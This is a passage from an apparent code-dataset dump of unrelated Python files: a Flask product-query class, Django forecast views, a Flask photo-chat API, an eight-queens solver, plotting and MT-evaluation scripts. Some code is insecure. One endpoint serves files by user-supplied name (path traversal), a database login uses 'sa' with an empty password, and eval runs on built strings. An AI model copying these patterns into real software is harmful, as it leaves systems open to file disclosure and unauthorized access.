= inter1&(eval(f\"{present[2]}\"))\n\n if x==2:\n inter = set(eval(f\"{present[0]}\"))&set(eval(f\"{present[1]}\"))\n\n if x==1:\n inter = set(eval(f\"{present[0]}\"))\n\n return list(inter)\n \n def products_count_avg(self):\n \n trio = 
[\"list1\",\"list2\",\"list3\",\"list4\"]\n the_trio = []\n \n try:\n list1 = set(self.discount()) \n except Exception:\n the_trio.append(\"list1\") \n try:\n list2 = set(self.brand_name())\n except Exception:\n the_trio.append(\"list2\")\n try:\n list3 = set(self.competition())\n except Exception:\n the_trio.append(\"list3\")\n\n try:\n list4 = set(self.discount_diff())\n except Exception:\n the_trio.append(\"list4\")\n \n present = list(set(trio)^set(the_trio))\n\n x = len(present)\n \n if x==4:\n inter2 = (eval(f\"{present[0]}\"))&(eval(f\"{present[1]}\"))\n inter1 = inter2&(eval(f\"{present[2]}\"))\n inter = inter1&(eval(f\"{present[3]}\"))\n \n if x==3:\n \n inter1 = (eval(f\"{present[0]}\"))&(eval(f\"{present[1]}\"))\n inter = inter1&(eval(f\"{present[2]}\"))\n\n if x==2:\n inter = (eval(f\"{present[0]}\"))&(eval(f\"{present[1]}\"))\n\n if x==1:\n \n inter = (eval(f\"{present[0]}\"))\n \n \n listofarray = (self.prod_to_dis(inter))\n\n count = len(listofarray)\n \n if count == 0:\n return [\"The returned list for these filters is empty.\"]\n else:\n avg = ((sum(listofarray))/count).tolist()\n\n return [f\"The number of discounts for these filters are {count}\",f\"The average discount for these filters is {avg}\"]\n \n def expensive_list(self):\n \n trio = [\"list1\",\"list2\",\"list3\",\"list4\"]\n the_trio = []\n try:\n list1 = set(self.discount())\n except Exception:\n the_trio.append(\"list1\") \n try:\n list2 = set(self.brand_name())\n except Exception:\n the_trio.append(\"list2\")\n try:\n list3 = set(self.competition())\n except Exception:\n the_trio.append(\"list3\")\n\n\n list4 = set(self.undercut())\n\n present = list(set(trio)^set(the_trio))\n\n x = len(present)\n\n if x==4:\n inter2 = (eval(f\"{present[0]}\"))&(eval(f\"{present[1]}\"))\n inter1 = inter2&(eval(f\"{present[2]}\"))\n inter = inter1&(eval(f\"{present[3]}\"))\n\n if x==3:\n inter1 = (eval(f\"{present[0]}\"))&(eval(f\"{present[1]}\"))\n inter = inter1&(eval(f\"{present[2]}\"))\n\n if x==2:\n inter = (eval(f\"{present[0]}\"))&(eval(f\"{present[1]}\"))\n\n if x==1:\n inter = (eval(f\"{present[0]}\"))\n\n\n return list(inter) \n \n \n def competition_discount_diff_list(self):\n \n trio = [\"list1\",\"list2\",\"list3\",\"list4\"]\n the_trio = []\n try:\n list1 = set(self.discount_diff())\n except Exception:\n the_trio.append(\"list1\") \n try:\n list2 = set(self.brand_name())\n except Exception:\n the_trio.append(\"list2\")\n try:\n list3 = set(self.competition())\n except Exception:\n the_trio.append(\"list3\")\n \n try:\n list4 = set(self.discount())\n except Exception:\n the_trio.append(\"list4\")\n\n present = list(set(trio)^set(the_trio))\n\n x = len(present)\n\n if x==4:\n inter2 = (eval(f\"{present[0]}\"))&(eval(f\"{present[1]}\"))\n inter1 = inter2&(eval(f\"{present[2]}\"))\n inter = inter1&(eval(f\"{present[3]}\"))\n\n if x==3:\n inter1 = (eval(f\"{present[0]}\"))&(eval(f\"{present[1]}\"))\n inter = inter1&(eval(f\"{present[2]}\"))\n\n if x==2:\n inter = (eval(f\"{present[0]}\"))&(eval(f\"{present[1]}\"))\n\n if x==1:\n inter = (eval(f\"{present[0]}\"))\n\n\n return list(inter)\n \n\n\nclass Input(Queries): # This class has a method which assigns queries to right query methods\n \n def __init__(self,data,f1,f2,f3,query):\n super().__init__(data,f1,f2,f3)\n self.query = query\n \n def __repr__(self):\n return \"Input({},{},{},{},{})\".format(self.data,self.f1,self.f2,self.f3,f\"{self.query}\")\n \n def get_results(self):\n \n if self.query == \"discounted_products_list\":\n return 
self.discounted_products_list()\n \n if self.query == \"discounted_products_count|avg_discount\":\n return self.products_count_avg()\n \n if self.query == \"expensive_list\":\n return self.expensive_list()\n \n if self.query == \"competition_discount_diff_list\":\n return self.competition_discount_diff_list()\n \n @classmethod \n def convert(cls,data,q1): # It's a class method for transforming inputs.\n \n cls.q1 = q1\n # cls.data = data\n \n # df = [json.loads(line) for line in open('netaporter_gb_similar.json', 'r')]\n # data=pd.DataFrame(df)\n \n# url2 = 'https://greendeck-datasets-2.s3.amazonaws.com/netaporter_gb_similar.json'\n# data = pd.read_json(url2,lines=True,orient='columns')\n \n # data = pd.read_json(cls.data_file,lines=True,orient='columns') \n\n query = cls.q1[\"query_type\"]\n if query == \"expensive_list\":\n try: \n filters = cls.q1[\"filters\"]\n except Exception:\n f1 = []\n f2 = []\n f3 = []\n return cls(data,f1,f2,f3,f\"{query}\")\n \n \n else :\n \n filters = cls.q1[\"filters\"]\n \n f1 = []\n f2 = []\n f3 = []\n for xc in range(len(filters)):\n fa = filters[xc][\"operand1\"]\n fb = filters[xc][\"operator\"]\n fc = filters[xc][\"operand2\"]\n f1.append(fa)\n f2.append(fb)\n f3.append(fc)\n \n \n return cls(data,f1,f2,f3,f\"{query}\")\n \n","sub_path":"Flask101.py","file_name":"Flask101.py","file_ext":"py","file_size_in_byte":12781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"3226121","text":"from forecast.forms import ContactForm, ForecastForm,FcastAllForm\nfrom django.shortcuts import get_object_or_404, render\nfrom forecast.models import Forecast\nfrom datetime import date,timedelta\nimport datetime\nfrom django.db.models import Avg, Max, Min, Sum\nfrom django.http import HttpResponseRedirect\nimport json \nimport pyodbc\nfrom django.http.response import JsonResponse\nfrom .queries import getQuery,query2,query3\n\n\ndef testodbc(request, cname=\"\"):\n #conn = pyodbc.connect('DRIVER={SQL Server Native Client 11.0};SERVER=acct-svr;DATABASE=quickbooks15_opensync2FF;UID=sa;PWD=')\n conn = pyodbc.connect('DRIVER={SQL Server Native Client 11.0};SERVER=acct-svr;DATABASE=quickbooks15_opensync2;UID=sa;PWD=')\n c = conn.cursor() \n\n\n customers = []\n itemz = []\n #curs = c.execute(getQuery(cname))\n curs = c.execute(query3)\n res = c.fetchall()\n results = []\n results_c = []\n results_w = []\n crims = []\n whites = []\n d1,d2,d3 = [],[],[]\n columns = [column[0] for column in curs.description]\n for row in res:\n results.append(dict(zip(columns, row)))\n i = 0\n while i < len(results):\n if results[i].get('type') == \"Crimini\":\n results_c.append(results[i])\n i += 1\n elif results[i].get('type') == \"White\":\n results_w.append(results[i])\n i += 1\n else:\n i += 1\n dayz = []\n for x in results_c:\n if x['saledate'] in dayz:\n pass\n else:\n dayz.append(x['saledate'])\n # xi = 0\n # while xi < len(results_c):\n for x in results_c:\n if x['saledate'] == dayz[0]:\n d1 += [x]\n elif x['saledate'] == dayz[1]:\n d2 += [x]\n elif x['saledate'] == dayz[2]:\n d3 += [x]\n else:\n pass\n\n \n\n \n template_name = 'testodbc.html'\n #context = {'results':customers,'itemz':itemz}\n context = {\"resz\":results_w, \"resz_c\":results_c,\"day1\":d1,\"day2\":d2,\"day3\":d3}\n return render(request,template_name,context)\n\n\n #if request.method == 'GET':\n #return JsonResponse(results,safe=False)\n\n\n ###############WORKING#############################\n # i = 0\n # while i < len(results):\n # if results[i].get('type') == 
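# Editor's sketch (hypothetical helper): each query method in the Flask101
# record above repeats the same gather-sets-then-intersect branching on
# x == 4/3/2/1; functools.reduce over whichever filter sets survived removes
# that branching entirely.
from functools import reduce

def intersect_present(candidate_sets):
    present = [s for s in candidate_sets if s is not None]
    if not present:
        return []
    return list(reduce(lambda a, b: a & b, present))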
\"Crimini\":\n # crims.append(results[i].get('totalcasez'))\n # i += 1\n # elif results[i].get('type') == \"White\":\n # whites.append(results[i].get('totalcasez'))\n # i += 1\n # else:\n # i += 1\n\n # total_crims = 0\n # for i in crims:\n # total_crims += i\n\n # total_whites = 0\n # for i in whites:\n # total_whites += i\n ###############WORKING#############################\n # for index in range(len(results)):\n # for key in results[index]:\n # customers.append(results[index]['CustomerRef_FullName'])\n # itemz.append(results[index]['Name'])\n\n #if request.method == 'GET':\n #return JsonResponse(results,safe=False)\n\n#####################################################################################################################\n#####################################################################################################################\n#####################################################################################################################\n#####################################################################################################################\n\n\ndef currentf(request):\n d1 = date.today()\n d2 = d1 + timedelta(days=1)\n d3 = d1 + timedelta(days=2)\n d4 = d1 + timedelta(days=3)\n d5 = d1 + timedelta(days=4)\n obj = Forecast.objects.all()\n lg5pct = 0.25\n\n \n obj2 = obj.aggregate(Sum('day1lbs'))\n obj3 = obj.aggregate(Sum('day2lbs'))\n obj4 = obj.aggregate(Sum('day3lbs'))\n obj5 = obj.aggregate(Sum('day4lbs'))\n #d1ttl = Forecast.objects.filter(Day1lbs > 0)\n # obj2 = obj.aggregate(Sum('totalamount'))\n template_name = 'fcast.html'\n total5 = (lg5pct * obj2['day1lbs__sum']/5)\n total5_2 = (lg5pct * obj3['day2lbs__sum']/5)\n total5_3 = (lg5pct * obj4['day3lbs__sum']/5)\n total5_4 = (lg5pct * obj5['day4lbs__sum']/5)\n #total5_5 = (lg5pct * obj2['day5lbs__sum']/5)\n context = {\"forecastOBJ\":obj,\"d1\":d1,\"d2\":d2,\"d3\":d3,\"d4\":d4,\"d5\":d5,\"lbs\":obj2,\"test1\":total5,\"test2\":total5_2,\"test3\":total5_3,\"test4\":total5_4}\n\n\n return render(request,template_name,context)\n\n\ndef fcastedit(request):\n rmadd = request.POST.get('addroom')\n obj3 = Forecast.objects.all() \n ###########################################DAY SHIFT###################################################################\n for evt in obj3:\n if evt.shiftupdate != datetime.date.today():\n for rec in obj3:\n rec.day1lbs = rec.day2lbs\n rec.day2lbs = rec.day3lbs\n rec.day3lbs = 0\n rec.eclass = 'not-saved'\n rec.shiftupdate = datetime.date.today()\n ##########################################UPDATING A ROOMS' VALUES######################################################\n if request.method == 'POST' and rmadd == None:\n print(request.POST.get('delcheckbox'))\n d1update= request.POST.get('day1')\n d2update= request.POST.get('day2')\n d3update= request.POST.get('day3')\n onetosave = Forecast.objects.get(roomno = request.POST.get('roomno'))\n onetosave.day1lbs = d1update\n onetosave.day2lbs = d2update\n onetosave.day3lbs = d3update\n onetosave.updated = datetime.date.today()\n onetosave.eclass = 'input-box'\n if request.POST.get('delcheckbox') == None:\n onetosave.save()\n else:\n onetosave.delete()\n \n return HttpResponseRedirect(\"/fcast/all\")\n\n #########################################ADDING A ROOM###################################################################\n if rmadd:\n Forecast.objects.create(roomno = rmadd,updated = datetime.date.today(),shiftupdate = datetime.date.today())\n rmadd = None\n return HttpResponseRedirect(\"/fcast/all\")\n\n 
#########################################################################################################################\n template_name = 'update.html'\n context = {'obj3':obj3}\n return render(request,template_name,context)\n\n\ndef addroom(request):\n roomtoadd = request.POST.get('addme')\n print(roomtoadd)\n obj = Forecast.objects.create(roomno = roomtoadd)\n form = ForecastForm(request.POST or None,instance=obj)\n if form.is_valid():\n form.save()\n template_name = 'update.html'\n context = {'form':form}\n return render(request,template_name,context)\n\ndef fcastall(request):\n #obj = Forecast.objects.all()\n form = FcastAllForm(request.POST or None)\n if form.is_valid():\n print(form.cleaned_data)\n template_name = 'form2.html'\n context = {'newform':form}\n return render(request,template_name,context)\n\n\n\n\n \n","sub_path":"src/djangolite/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"492670999","text":"import matplotlib.pyplot as plt\n\nblood_sugar_men = [113, 85, 90, 150, 149, 88, 93, 115, 135, 80, 77, 82, 129]\nblood_sugar_women = [67, 98, 89, 120, 133, 150, 84, 69, 89, 79, 120, 112, 100]\n\ntype = [blood_sugar_men, blood_sugar_women]\ncolors = ['g', 'r']\nlabel = ['men', 'women']\nbins = [80, 100, 125, 150]\nplt.xlabel(\"Blood Sugar Range\")\nplt.ylabel(\"Total no. of patients\")\n# Diabetic blood_sugar range\n#\n# 80 - 100 = normal\n# 100 - 125 = pre-diabetic\n# above 125 = diabetic\n\nplt.hist(type, bins=bins, rwidth=0.95, color=colors,\n label=label, orientation=\"horizontal\")\n\nplt.title(\"Blood Sugar Level Chart\")\nplt.legend()\nplt.show()","sub_path":"histogram.py","file_name":"histogram.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"329385589","text":"#!/usr/bin/env python3\nfrom argparse import ArgumentParser\nfrom importlib import import_module\nimport os\nimport time\n\n\ndef main():\n parser = ArgumentParser()\n parser.add_argument('test_case')\n parser.add_argument('-c', '--concurrency', type=int, default=1)\n parser.add_argument('-n', '--num-tasks', type=int, default=1)\n parser.add_argument('--pid-file')\n opts = parser.parse_args()\n\n if opts.pid_file:\n with open(opts.pid_file, 'w') as out:\n out.write(str(os.getpid()))\n \n # Sleep a bit to give profilng tools a time\n # to start their work\n time.sleep(0.01)\n\n mod = import_module('case.%s' % opts.test_case)\n\n print('Loading tasks into queue')\n taskq = []\n for _ in range(opts.num_tasks):\n taskq.append('https://en.wikipedia.org/wiki/Python_(programming_language)')\n\n print('Starting test, c=%d, n=%d' % (opts.concurrency, opts.num_tasks))\n mod.run(taskq, opts.concurrency)\n print('Test finished')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"runtest.py","file_name":"runtest.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"54849380","text":"import flask\r\nfrom flask import jsonify, request, send_file\r\nfrom datetime import datetime\r\nfrom db import open_db, close_db\r\nimport os\r\n\r\napp = flask.Flask(__name__)\r\napp.config['DEBUG'] = True\r\n\r\n\r\n@app.route('/api/v1/send', methods=['GET', 'POST']) #percorso per ricezione\r\ndef send():\r\n if request.method == 'POST': # Se la richiesta è di tipo post il client sta inviando un'immagine\r\n photo = 
request.files['file'] # prendo il nome della foto es: foto.png\r\n\r\n name, ext = os.path.splitext(photo.filename) # divido nome file ed estensione\r\n if ext not in ('.png', '.jpg', '.jpeg'): # verifico che l'estensione sia valida\r\n return 'Non hai inviato una foto!'\r\n\r\n save_path = 'Server_photo_storage' # la path dove salvo le foto dei client da inviare\r\n\r\n if not os.path.exists(save_path): # se il percorso sopracitato non esiste lo creo\r\n os.makedirs(save_path)\r\n\r\n file_path = f\"{save_path}/{photo.filename}\" # creo il percorso finale dove salvero il file\r\n\r\n photo.save(file_path) # salvo la foto\r\n\r\n conn = open_db() # apro il database\r\n cur = conn.cursor()\r\n\r\n query_parameters = request.args # parametri dell'url\r\n\r\n text = '📷[%s] salvato in Client_photo_storage/received_photo/%s' % (str(file_path).split('/')[-1], str(file_path).split('/')[1]) # sebbene avrei potuto usare il parametro text come una descrizione della\r\n # foto ho deciso di sfruttarlo per infromare l'utente il percorso di salvataggio\r\n sender_id = query_parameters.get('sender_id') # determino chi è il mittente\r\n receiver_id = query_parameters.get('receiver_id') # determino chi è il destinario\r\n\r\n # inserisco nella tabella del Server il messaggio settando is_received = 0 finche non arriverà la prima richiesta all'url recv da parte del client\r\n cur.execute(\r\n 'INSERT INTO Server_messages(receiver_id, sender_id, text, time, is_received, is_photo, photo_path) VALUES(?,?,?,?,?,?,?)',\r\n (receiver_id, sender_id, text, datetime.timestamp(datetime.now()), 0, 1, file_path,))\r\n\r\n conn.commit()\r\n\r\n conn.close()\r\n\r\n return f\"Il server ha ricevuto correattamente la foto!\"\r\n\r\n else:\r\n # discorso analogo a sopra\r\n conn = open_db()\r\n cur = conn.cursor()\r\n\r\n query_parameters = request.args\r\n\r\n text = str(query_parameters.get('text')).replace('+', ' ')\r\n sender_id = query_parameters.get('sender_id')\r\n receiver_id = query_parameters.get('receiver_id')\r\n\r\n cur.execute('INSERT INTO Server_messages(receiver_id, sender_id, text, time, is_received, is_photo) VALUES(?,?,?,?,?,?)', (receiver_id, sender_id, text, datetime.timestamp(datetime.now()), 0, 0))\r\n conn.commit()\r\n\r\n conn.close()\r\n\r\n\r\n@app.route('/api/v1/download_photo', methods=['GET']) # api che mi consente di scaricare l'immagine richiesta\r\ndef download_photo():\r\n query_parameters = request.args # parametri url( in questo caso abbiamo ?photo_name=)\r\n photo_name = str(query_parameters.get('photo_name')) # il nome della foto\r\n\r\n return send_file('Server_photo_storage/%s' % photo_name, as_attachment=True) # cerco nella cartella Server_photo l'immagine con il nome ricevuto come parametro\r\n # il programma si puo' migliorare salvando le foto mandate dai client con un nuovo nome generato da token per evitare sovracrivamenti\r\n\r\n\r\n@app.route('/api/v1/receive', methods=['GET']) # api per la ricezione di nuovi messaggi\r\ndef receive():\r\n def dict_factory(cursor, row): # funzione(presa online) che consente di accedere ai valori attraverso i nomi dei campi\r\n d = {}\r\n for idx, col in enumerate(cursor.description):\r\n d[col[0]] = row[idx]\r\n return d\r\n\r\n conn = open_db() # apro il db\r\n conn.row_factory = dict_factory # vedere la funzione\r\n\r\n cur = conn.cursor()\r\n\r\n query_parameters = request.args # parametri ricevuti\r\n\r\n receiver_id = query_parameters.get('receiver_id') # prendo il receiver_id per prendere solo i messaggi indirizzati al destinatario 
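# Editor's sketch: the record's own comments note that uploads in send() reuse
# the client-supplied filename and can overwrite each other; werkzeug's
# secure_filename (already a Flask dependency) at least sanitises that name
# before it reaches the filesystem path.
from werkzeug.utils import secure_filename

safe_name = secure_filename(photo.filename)
file_path = os.path.join(save_path, safe_name)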
richiesto\r\n\r\n messages = cur.execute('SELECT * FROM Server_messages WHERE is_received = 0 AND receiver_id = ?', (receiver_id,)).fetchall() # assegno a message il dizionario finale da inviare al client\r\n # setto la variabile is_received = 1\r\n\r\n cur.execute('UPDATE Server_messages SET is_received = 1 WHERE receiver_id = ?', (receiver_id,))\r\n conn.commit()\r\n\r\n close_db(conn)\r\n\r\n return jsonify(messages) # effettuo il json e lo ritorno\r\n\r\n\r\n@app.route('/api/v1/user_list', methods=['GET']) # semplice url per stampare i nome e gli id degli utenti\r\ndef users_list():\r\n def dict_factory(cursor, row): # funzione spiegata in receive()\r\n d = {}\r\n for idx, col in enumerate(cursor.description):\r\n d[col[0]] = row[idx]\r\n return d\r\n\r\n conn = open_db()\r\n conn.row_factory = dict_factory\r\n\r\n cur = conn.cursor()\r\n\r\n users_list = cur.execute('SELECT * FROM users WHERE 1=1').fetchall()\r\n\r\n close_db(conn)\r\n\r\n return jsonify(users_list) # ritorno il json\r\n\r\n\r\nwhile __name__ == \"__main__\":\r\n app.run(host='0.0.0.0')\r\n","sub_path":"Sylla_Flask_Api_Chat/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":5621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"333437671","text":"from copy import deepcopy\n\n\ndef place_queens(columns, row, results):\n if row == 8:\n results.append(deepcopy(columns))\n else:\n for col in range(8):\n if check_valid(columns, row, col):\n columns[row] = col\n place_queens(columns, row + 1, results)\n\n\ndef check_valid(columns, row, col):\n for r in range(row):\n # Check column.\n c = columns[r]\n if c == col:\n return False\n \n # Check diagonal.\n col_dist = abs(c - col)\n row_dist = row - r\n if col_dist == row_dist:\n return False\n return True\n\n\ndef main():\n results = []\n place_queens([0 for i in range(8)], 0, results)\n print(results)\n\n\nmain()","sub_path":"ctci/ch8/8queens.py","file_name":"8queens.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"105814136","text":"# Overall imports\nimport argparse\nimport operator\n\n# In-package imports\nimport ngram_utils\nimport stat_utils\nimport corpus_utils\nimport sign_utils\nimport scorers\nimport bucketers\nimport arg_utils\nimport print_utils\n\n\ndef print_score_report(ref, out1, out2,\n score_type='bleu',\n bootstrap=0):\n \"\"\"\n Print a report comparing overall scores of the two systems.\n\n Args:\n ref: Tokens from the reference\n out1: Tokens from the output file 1\n out2: Tokens from the output file 2\n score_type: A string specifying the scoring type (bleu/length)\n \"\"\"\n scorer = scorers.create_scorer_from_profile(score_type)\n print(f'{scorer.name()}:')\n score1, str1 = scorer.score_corpus(ref,out1)\n score2, str2 = scorer.score_corpus(ref,out2)\n if str1 is not None:\n print(f' Sys1: {score1} ({str1})\\n Sys2: {score2} ({str2})')\n else:\n print(f' Sys1: {score1}\\n Sys2: {score2}')\n\n if int(bootstrap) > 0:\n print('Significance test. 
This may take a while.')\n wins, sys1_stats, sys2_stats = sign_utils.eval_with_paired_bootstrap(ref, out1, out2, score_type=score_type, num_samples=int(bootstrap))\n\n print('Win ratio: Sys1=%.3f, Sys2=%.3f, tie=%.3f' % (wins[0], wins[1], wins[2]))\n if wins[0] > wins[1]:\n print('(Sys1 is superior with p value p=%.3f)\\n' % (1-wins[0]))\n elif wins[1] > wins[0]:\n print('(Sys2 is superior with p value p=%.3f)\\n' % (1-wins[1]))\n\n print('Sys1: mean=%.3f, median=%.3f, 95%% confidence interval=[%.3f, %.3f]' %\n (sys1_stats['mean'], sys1_stats['median'], sys1_stats['lower_bound'], sys1_stats['upper_bound']))\n print('Sys2: mean=%.3f, median=%.3f, 95%% confidence interval=[%.3f, %.3f]' %\n (sys2_stats['mean'], sys2_stats['median'], sys2_stats['lower_bound'], sys2_stats['upper_bound']))\n\ndef print_word_accuracy_report(ref, out1, out2,\n acc_type='fmeas', bucket_type='freq',\n freq_count_file=None, freq_corpus_file=None,\n label_set=None,\n ref_labels=None, out1_labels=None, out2_labels=None):\n \"\"\"\n Print a report comparing the word accuracy.\n\n Args:\n ref: Tokens from the reference\n out1: Tokens from the output file 1\n out2: Tokens from the output file 2\n acc_type: The type of accuracy to show (prec/rec/fmeas). Can also have multiple separated by '+'.\n bucket_type: A string specifying the way to bucket words together to calculate F-measure (freq/tag)\n freq_corpus_file: When using \"freq\" as a bucketer, which corpus to use to calculate frequency.\n By default this uses the frequency in the reference test set, but it's often more informative\n to use the frequency in the training set, in which case you specify the path of the\n training corpus.\n freq_count_file: An alternative to freq_corpus that uses a count file in \"word\\tfreq\" format.\n ref_labels: either a filename of a file full of reference labels, or a list of strings corresponding to `ref`.\n out1_labels: output 1 labels. must be specified if ref_labels is specified.\n out2_labels: output 2 labels. 
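# Editor's illustration (simplified): the paired bootstrap used above resamples
# the same sentence indices for both systems and counts wins; the real logic
# lives in sign_utils.eval_with_paired_bootstrap and additionally handles ties
# and corpus-level scorers.
import random

def paired_bootstrap_wins(scores1, scores2, num_samples=1000):
    n, wins1 = len(scores1), 0
    for _ in range(num_samples):
        idx = [random.randrange(n) for _ in range(n)]
        if sum(scores1[i] for i in idx) > sum(scores2[i] for i in idx):
            wins1 += 1
    return wins1 / num_samples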
must be specified if ref_labels is specified.\n \"\"\"\n acc_type_map = {'prec': 3, 'rec': 4, 'fmeas': 5}\n bucketer = bucketers.create_word_bucketer_from_profile(bucket_type,\n freq_count_file=freq_count_file,\n freq_corpus_file=freq_corpus_file,\n freq_data=ref,\n label_set=label_set)\n ref_labels = corpus_utils.load_tokens(ref_labels) if type(ref_labels) == str else ref_labels\n out1_labels = corpus_utils.load_tokens(out1_labels) if type(out1_labels) == str else out1_labels\n out2_labels = corpus_utils.load_tokens(out2_labels) if type(out2_labels) == str else out2_labels\n matches1 = bucketer.calc_bucketed_matches(ref, out1, ref_labels=ref_labels, out_labels=out1_labels)\n matches2 = bucketer.calc_bucketed_matches(ref, out2, ref_labels=ref_labels, out_labels=out2_labels)\n acc_types = acc_type.split('+')\n for at in acc_types:\n if at not in acc_type_map:\n raise ValueError(f'Unknown accuracy type {at}')\n aid = acc_type_map[at]\n print(f'--- word {acc_type} by {bucketer.name()} bucket')\n for bucket_str, match1, match2 in zip(bucketer.bucket_strs, matches1, matches2):\n print(\"{}\\t{:.4f}\\t{:.4f}\".format(bucket_str, match1[aid], match2[aid]))\n print()\n\ndef print_src_word_accuracy_report(src, ref, out1, out2, ref_align, out1_align, out2_align,\n acc_type='fmeas', bucket_type='freq',\n freq_count_file=None, freq_corpus_file=None,\n label_set=None,\n src_labels=None):\n \"\"\"\n Print a report for source word analysis.\n\n Args:\n src: Tokens from the source\n ref: Tokens from the reference\n out1: Tokens from the output file 1\n out2: Tokens from the output file 2\n ref_align: Alignment file for the reference\n out1_align: Alignment file for the output file 1\n out2_align: Alignment file for the output file 2\n acc_type: The type of accuracy to show (prec/rec/fmeas). 
Can also have multiple separated by '+'.\n bucket_type: A string specifying the way to bucket words together to calculate F-measure (freq/tag)\n freq_corpus_file: When using \"freq\" as a bucketer, which corpus to use to calculate frequency.\n By default this uses the frequency in the reference test set, but it's often more informative\n se the frequency in the training set, in which case you specify the path of the target side\n he training corpus.\n freq_count_file: An alternative to freq_corpus that uses a count file in \"word\\tfreq\" format.\n src_labels: either a filename of a file full of source labels, or a list of strings corresponding to `ref`.\n \"\"\"\n ref_align, out1_align, out2_align = [corpus_utils.load_tokens(x) for x in (ref_align, out1_align, out2_align)]\n acc_type_map = {'prec': 3, 'rec': 4, 'fmeas': 5}\n bucketer = bucketers.create_word_bucketer_from_profile(bucket_type,\n freq_count_file=freq_count_file,\n freq_corpus_file=freq_corpus_file,\n freq_data=src,\n label_set=label_set)\n src_labels = corpus_utils.load_tokens(src_labels) if type(src_labels) == str else src_labels\n matches1 = bucketer.calc_source_bucketed_matches(src, ref, out1, ref_align, out1_align, src_labels=src_labels)\n matches2 = bucketer.calc_source_bucketed_matches(src, ref, out2, ref_align, out2_align, src_labels=src_labels)\n acc_types = acc_type.split('+')\n for at in acc_types:\n if at not in acc_type_map:\n raise ValueError(f'Unknown accuracy type {at}')\n aid = acc_type_map[at]\n print(f'--- word {acc_type} by {bucketer.name()} bucket')\n for bucket_str, match1, match2 in zip(bucketer.bucket_strs, matches1, matches2):\n print(\"{}\\t{:.4f}\\t{:.4f}\".format(bucket_str, match1[aid], match2[aid]))\n print()\n\ndef print_sentence_bucketed_report(ref, out1, out2,\n bucket_type='score', statistic_type='count',\n score_measure='bleu'):\n \"\"\"\n Print a report of sentences by bucket\n\n Args:\n ref: Tokens from the reference\n out1: Tokens from the output file 1\n out2: Tokens from the output file 2\n bucket_type: The type of bucketing method to use\n score_measure: If using 'score' as either bucket_type or statistic_type, which scorer to use\n \"\"\"\n bucketer = bucketers.create_sentence_bucketer_from_profile(bucket_type, score_type=score_measure)\n bc1 = bucketer.create_bucketed_corpus(out1, ref=ref)\n bc2 = bucketer.create_bucketed_corpus(out2, ref=ref)\n\n if statistic_type == 'count':\n aggregator = lambda out,ref: len(out)\n elif statistic_type == 'score':\n scorer = scorers.create_scorer_from_profile(score_measure)\n aggregator = lambda out,ref: scorer.score_corpus(ref,out)[0]\n else:\n raise ValueError(f'Illegal statistic_type {statistic_type}')\n\n stats1 = [aggregator(out,ref) for (out,ref) in bc1]\n stats2 = [aggregator(out,ref) for (out,ref) in bc2]\n\n print(f'--- bucket_type={bucket_type}, statistic_type={statistic_type}, score_measure={score_measure}')\n for bs, s1, s2 in zip(bucketer.bucket_strs, stats1, stats2):\n print(f'{bs}\\t{s1}\\t{s2}')\n print()\n\ndef print_ngram_report(ref, out1, out2,\n min_ngram_length=1, max_ngram_length=4,\n report_length=50, alpha=1.0, compare_type='match',\n ref_labels=None, out1_labels=None, out2_labels=None):\n \"\"\"\n Print a report comparing aggregate n-gram statistics\n\n Args:\n ref: Tokens from the reference\n out1: Tokens from the output file 1\n out2: Tokens from the output file 2\n min_ngram_length: minimum n-gram length\n max_ngram_length: maximum n-gram length\n report_length: the number of n-grams to report\n alpha: when sorting 
n-grams for salient features, the smoothing coefficient. A higher smoothing coefficient\n will result in more frequent phenomena (sometimes this is good).\n compare_type: what type of statistic to compare\n (match: n-grams that match the reference, over: over-produced ngrams, under: under-produced ngrams)\n ref_labels: either a filename of a file full of reference labels, or a list of strings corresponding to `ref`.\n If specified, will aggregate statistics over labels instead of n-grams.\n out1_labels: output 1 labels. must be specified if ref_labels is specified.\n out2_labels: output 2 labels. must be specified if ref_labels is specified.\n \"\"\"\n print(f'--- min_ngram_length={min_ngram_length}, max_ngram_length={max_ngram_length}')\n print(f' report_length={report_length}, alpha={alpha}, compare_type={compare_type}')\n if type(ref_labels) == str:\n print(f' ref_labels={ref_labels}, out1_labels={out1_labels}, out2_labels={out2_labels}')\n print()\n\n ref_labels = corpus_utils.load_tokens(ref_labels) if type(ref_labels) == str else ref_labels\n out1_labels = corpus_utils.load_tokens(out1_labels) if type(out1_labels) == str else out1_labels\n out2_labels = corpus_utils.load_tokens(out2_labels) if type(out2_labels) == str else out2_labels\n total1, match1, over1, under1 = ngram_utils.compare_ngrams(ref, out1, ref_labels=ref_labels, out_labels=out1_labels,\n min_length=min_ngram_length, max_length=max_ngram_length)\n total2, match2, over2, under2 = ngram_utils.compare_ngrams(ref, out2, ref_labels=ref_labels, out_labels=out2_labels,\n min_length=min_ngram_length, max_length=max_ngram_length)\n if compare_type == 'match':\n scores = stat_utils.extract_salient_features(match1, match2, alpha=alpha)\n elif compare_type == 'over':\n scores = stat_utils.extract_salient_features(over1, over2, alpha=alpha)\n elif compare_type == 'under':\n scores = stat_utils.extract_salient_features(under1, under2, alpha=alpha)\n else:\n raise ValueError(f'Illegal compare_type \"{compare_type}\"')\n scorelist = sorted(scores.items(), key=operator.itemgetter(1), reverse=True)\n\n print(f'--- {report_length} n-grams that System 1 had higher {compare_type}')\n for k, v in scorelist[:report_length]:\n print('{}\\t{} (sys1={}, sys2={})'.format(' '.join(k), v, match1[k], match2[k]))\n print(f'\\n--- {report_length} n-grams that System 2 had higher {compare_type}')\n for k, v in reversed(scorelist[-report_length:]):\n print('{}\\t{} (sys1={}, sys2={})'.format(' '.join(k), v, match1[k], match2[k]))\n print()\n\ndef print_sentence_examples(ref, out1, out2,\n score_type='sentbleu',\n 